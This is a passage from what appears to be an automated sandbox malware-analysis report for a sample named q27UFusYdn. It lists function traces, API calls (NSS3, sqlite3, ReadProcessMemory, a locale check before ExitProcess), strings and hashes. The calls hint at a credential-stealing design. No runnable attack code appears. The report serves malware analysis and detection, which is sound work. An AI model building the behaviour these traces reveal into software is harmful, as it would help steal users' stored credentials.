Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 257f3850892768e9cabd68c87e3cd1472cca1fba99ded6c0bb976269befc0b16
Instruction ID: 05ae0b67f6716ceb19ef7e3112a79029b82f6fca47876aa8095275fd9dc80ed2
Opcode Fuzzy Hash: 257f3850892768e9cabd68c87e3cd1472cca1fba99ded6c0bb976269befc0b16
Instruction Fuzzy Hash: 45F0E951F449186BD61041A59C10FD23B9A471539DF6985A2EA086BFB3D2069D604293

Uniqueness

Uniqueness Score: -1.00%

Function 00413430 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
ExitProcess.KERNEL32 ref: 00413465
ExitProcess.KERNEL32 ref: 0041346F
ExitProcess.KERNEL32 ref: 00413479
ExitProcess.KERNEL32 ref: 00413483
ExitProcess.KERNEL32 ref: 0041348D

Strings

*, xrefs: 0041344C

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction ID: 75b540bad49881e9417c8f8c63d74940121d586cf5f959f7794e893d96f52075
Opcode Fuzzy Hash: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction Fuzzy Hash: 4BF05830508608EFE364EFE0EF0976CBBB1EB8E703F001195E60A86290CA744A119B65

Uniqueness

Uniqueness Score: -1.00%

Function 6CE06E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6CE06ED8
sqlite3_value_text.NSS3(?,?), ref: 6CE06EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CE06FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6CE06FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CE06FF0
sqlite3_value_blob.NSS3(?,?), ref: 6CE07010
sqlite3_value_blob.NSS3(?,?), ref: 6CE0701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CE07052

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: a002534167d0361443da8ae89710a0846d9f8523a69d5bceee4e8346fb5d93f0
Instruction ID: 9d96cfad9995ecc41d6ee13a7fc20d6a2e704e6b6f2ae41259e556d3a37bfc28
Opcode Fuzzy Hash: a002534167d0361443da8ae89710a0846d9f8523a69d5bceee4e8346fb5d93f0
Instruction Fuzzy Hash: 9861C1B1F142068BDB00CFA4C8417EEB7B6AF45308F384168D815AB751E7369C66CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE78F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6CE77313), ref: 6CE78FBB

Part of subcall function 6CE707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE18298,?,?,?,6CE0FCE5,?), ref: 6CE707BF
Part of subcall function 6CE707B0: PL_HashTableLookup.NSS3(?,?), ref: 6CE707E6
Part of subcall function 6CE707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE7081B
Part of subcall function 6CE707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE70825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6CE77313), ref: 6CE79012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6CE77313), ref: 6CE7903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6CE77313), ref: 6CE7909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6CE77313), ref: 6CE790DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6CE77313), ref: 6CE790F1

Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE710F3
Part of subcall function 6CE710C0: EnterCriticalSection.KERNEL32(?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7110C
Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71141
Part of subcall function 6CE710C0: PR_Unlock.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71182
Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6CE77313), ref: 6CE7906B

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6CE77313), ref: 6CE79128

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: abfbc5514b4114f556d717285c06fc97a2e3aac3b32137bcac4ebf7b9901964c
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: C8516E71B002018BEB209F6ADC48B26B3F5AF4535CF364169E915D7B61EB32E815CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE62470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CE62D7C,6CE39192,?), ref: 6CE6248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6CE624A2
memset.VCRUNTIME140(6CE62D7C,00000020,6CE62D5C), ref: 6CE6250E
memset.VCRUNTIME140(6CE62D9C,00000020,6CE62D7C), ref: 6CE62535
memset.VCRUNTIME140(?,00000020,?), ref: 6CE6255C
memset.VCRUNTIME140(?,00000020,?), ref: 6CE62583
PR_Unlock.NSS3(?), ref: 6CE62594
PR_SetError.NSS3(00000000,00000000), ref: 6CE625AF

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 4ac4133cd5b72a085a2ae48f7c90496323217dea01d954d93e7922fe39c734b4
Instruction ID: a054078a49ac921aa2ec628b384138d3c4ad0a7f4497ce7af219a829ef7cd87b
Opcode Fuzzy Hash: 4ac4133cd5b72a085a2ae48f7c90496323217dea01d954d93e7922fe39c734b4
Instruction Fuzzy Hash: 3B4125B1E603415BEB109F74CC987A93774BBA9309F241668EC05D7B51F774A584C292

Uniqueness

Uniqueness Score: -1.00%

Function 6CF20860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6CF27AE2,?,?,?,?,?,?,6CF2798A), ref: 6CF2086C

Part of subcall function 6CF20930: EnterCriticalSection.KERNEL32(?,00000000,?,6CF20C83), ref: 6CF2094F
Part of subcall function 6CF20930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6CF20C83), ref: 6CF20974
Part of subcall function 6CF20930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CF20983
Part of subcall function 6CF20930: _PR_MD_UNLOCK.NSS3(?,?,6CF20C83), ref: 6CF2099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6CF27AE2,?,?,?,?,?,?,6CF2798A), ref: 6CF2087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6CF27AE2,?,?,?,?,?,?,6CF2798A), ref: 6CF20892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6CF2798A), ref: 6CF208AA
free.MOZGLUE(?,00000000,00000000,?,?,6CF27AE2,?,?,?,?,?,?,6CF2798A), ref: 6CF208C7
free.MOZGLUE(?,00000000,00000000,?,?,6CF27AE2,?,?,?,?,?,?,6CF2798A), ref: 6CF208E9
free.MOZGLUE(?,6CF27AE2,?,?,?,?,?,?,6CF2798A), ref: 6CF208EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6CF27AE2,?,?,?,?,?,?,6CF2798A), ref: 6CF2090E

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 3b2b09a9f97598346cf56a54652fd70ebd9d2e30f697d03e9cc42eef7987e6a8
Instruction ID: 46eca4be6099974e2c42e6e1689227c08b0855d033fad6901f3a045d19560909
Opcode Fuzzy Hash: 3b2b09a9f97598346cf56a54652fd70ebd9d2e30f697d03e9cc42eef7987e6a8
Instruction Fuzzy Hash: 7F11B6B2F112504BFF419B95ECB57973778EB41658F194128E41A87740DB75E408CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD94F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CD94FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CD951BB

Strings

%s at line %d of [%.10s], xrefs: 6CD951B4
unable to delete/modify user-function due to active statements, xrefs: 6CD951DF
misuse, xrefs: 6CD951AF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CD951A5

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: f569100d4f7171a98e89627aa23ca12a67ec489115bb9fd9031e84fc62100983
Instruction ID: c2a6b7614780de582a7f109b052b7554bf07ce72b47b2c78d91aacc4f5bda5bc
Opcode Fuzzy Hash: f569100d4f7171a98e89627aa23ca12a67ec489115bb9fd9031e84fc62100983
Instruction Fuzzy Hash: 0671AE79B0420ADBDB00CF55CC80B9A77B5BF48309F144635FD1A9BAA5E331E951CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00413BC0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00413BDF
??_U@YAPAXI@Z.MSVCRT ref: 00413C0D

Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5

VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
??_V@YAXPAX@Z.MSVCRT ref: 00413D73

Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8

Strings

@, xrefs: 00413C66
Z>A, xrefs: 00413C38, 00413C3B

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @$Z>A
API String ID: 2950663791-2427737632
Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE38C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CE38C7C

Part of subcall function 6CED9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF20A27), ref: 6CED9DC6
Part of subcall function 6CED9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF20A27), ref: 6CED9DD1
Part of subcall function 6CED9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CED9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE38CB0
TlsGetValue.KERNEL32 ref: 6CE38CD1
EnterCriticalSection.KERNEL32(?), ref: 6CE38CE5
PR_Unlock.NSS3(?), ref: 6CE38D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CE38D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE38D93

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 4032131a3789b7dd9641824079c0525b78d063f33191bce7077941c5f4555302
Instruction ID: 56df4bdf33153aaa662bc42a8cd0f2b19bd99ec8b1cd48a4318eebae9864e1a0
Opcode Fuzzy Hash: 4032131a3789b7dd9641824079c0525b78d063f33191bce7077941c5f4555302
Instruction Fuzzy Hash: 75312571E00621ABDB119F68DC44BAAB778BF45318F74113BEA19A7B50D730B924CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEA2460 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6CF47379,00000002,?), ref: 6CEA2493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CEA24B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6CF47379,00000002,?), ref: 6CEA24EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6CF47379,00000002,?), ref: 6CEA24F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6CF47379,00000002,?), ref: 6CEA24FE

Strings

5s/, xrefs: 6CEA246C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID: 5s/
API String ID: 2595244113-340167759
Opcode ID: aaee5955a6dddaf1374cb8df4bf4924099d782690666d890f10409fa9eef99f5
Instruction ID: 81961653c5d2f383413824fb515af17af91580a1386f1834acba5dadefc2a3fe
Opcode Fuzzy Hash: aaee5955a6dddaf1374cb8df4bf4924099d782690666d890f10409fa9eef99f5
Instruction Fuzzy Hash: A731C1B1A00155AFEB108FA6DC45BBA77B4EF5830CF204129FD19EA780E731D956C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE32E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CE2E728,?,00000038,?,?,00000000), ref: 6CE32E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE32E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE32E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6CE32E8F
PL_HashTableLookup.NSS3(?,?), ref: 6CE32E9E
PR_Unlock.NSS3(?), ref: 6CE32EAB
PR_Unlock.NSS3(?), ref: 6CE32F0D

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 0b90d4f37a80ab3321868fddc426014bb18704512545ea54704b93e0b9ade304
Instruction ID: f4aa984da898fface162c97239b6018554b33da10283ec05da25474d3ba1cf17
Opcode Fuzzy Hash: 0b90d4f37a80ab3321868fddc426014bb18704512545ea54704b93e0b9ade304
Instruction Fuzzy Hash: 14314375E00111ABEB016F28DC45976B774EF1621CB288168EC4897B12E731EC64C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE64470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6CE27296,00000000), ref: 6CE64487
EnterCriticalSection.KERNEL32(?,?,?,6CE27296,00000000), ref: 6CE644A0
PR_Unlock.NSS3(?,?,?,?,6CE27296,00000000), ref: 6CE644BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6CE27296,00000000), ref: 6CE644DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6CE27296,00000000), ref: 6CE64530
free.MOZGLUE(?,?,?,?,?,6CE27296,00000000), ref: 6CE6453C
PORT_FreeArena_Util.NSS3 ref: 6CE6454F

Part of subcall function 6CE4CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6CE2B1EE,D958E836,?,6CE651C5), ref: 6CE4CAFA
Part of subcall function 6CE4CAA0: PR_UnloadLibrary.NSS3(?,6CE651C5), ref: 6CE4CB09

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: 691c3002d4d8f0c8ee872cbd982c9b810d262c0d06298919d2f780e48c32f7f4
Instruction ID: 09840a4a4d03b43bb918eb668a6426c90344c4a640eada55868750b30a62dda8
Opcode Fuzzy Hash: 691c3002d4d8f0c8ee872cbd982c9b810d262c0d06298919d2f780e48c32f7f4
Instruction Fuzzy Hash: A53116B4A246518FDB10EF7AC094669BBF0BF05318F11462AD89997F01E735E898CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CE7CD93,?), ref: 6CE7CEEE

Part of subcall function 6CE714C0: TlsGetValue.KERNEL32 ref: 6CE714E0
Part of subcall function 6CE714C0: EnterCriticalSection.KERNEL32 ref: 6CE714F5
Part of subcall function 6CE714C0: PR_Unlock.NSS3 ref: 6CE7150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CE7CD93,?), ref: 6CE7CEFC

Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE710F3
Part of subcall function 6CE710C0: EnterCriticalSection.KERNEL32(?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7110C
Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71141
Part of subcall function 6CE710C0: PR_Unlock.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71182
Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CE7CD93,?), ref: 6CE7CF0B

Part of subcall function 6CE70840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE708B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CE7CD93,?), ref: 6CE7CF1D

Part of subcall function 6CE6FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CE68D2D,?,00000000,?), ref: 6CE6FB85
Part of subcall function 6CE6FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CE6FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CE7CD93,?), ref: 6CE7CF47
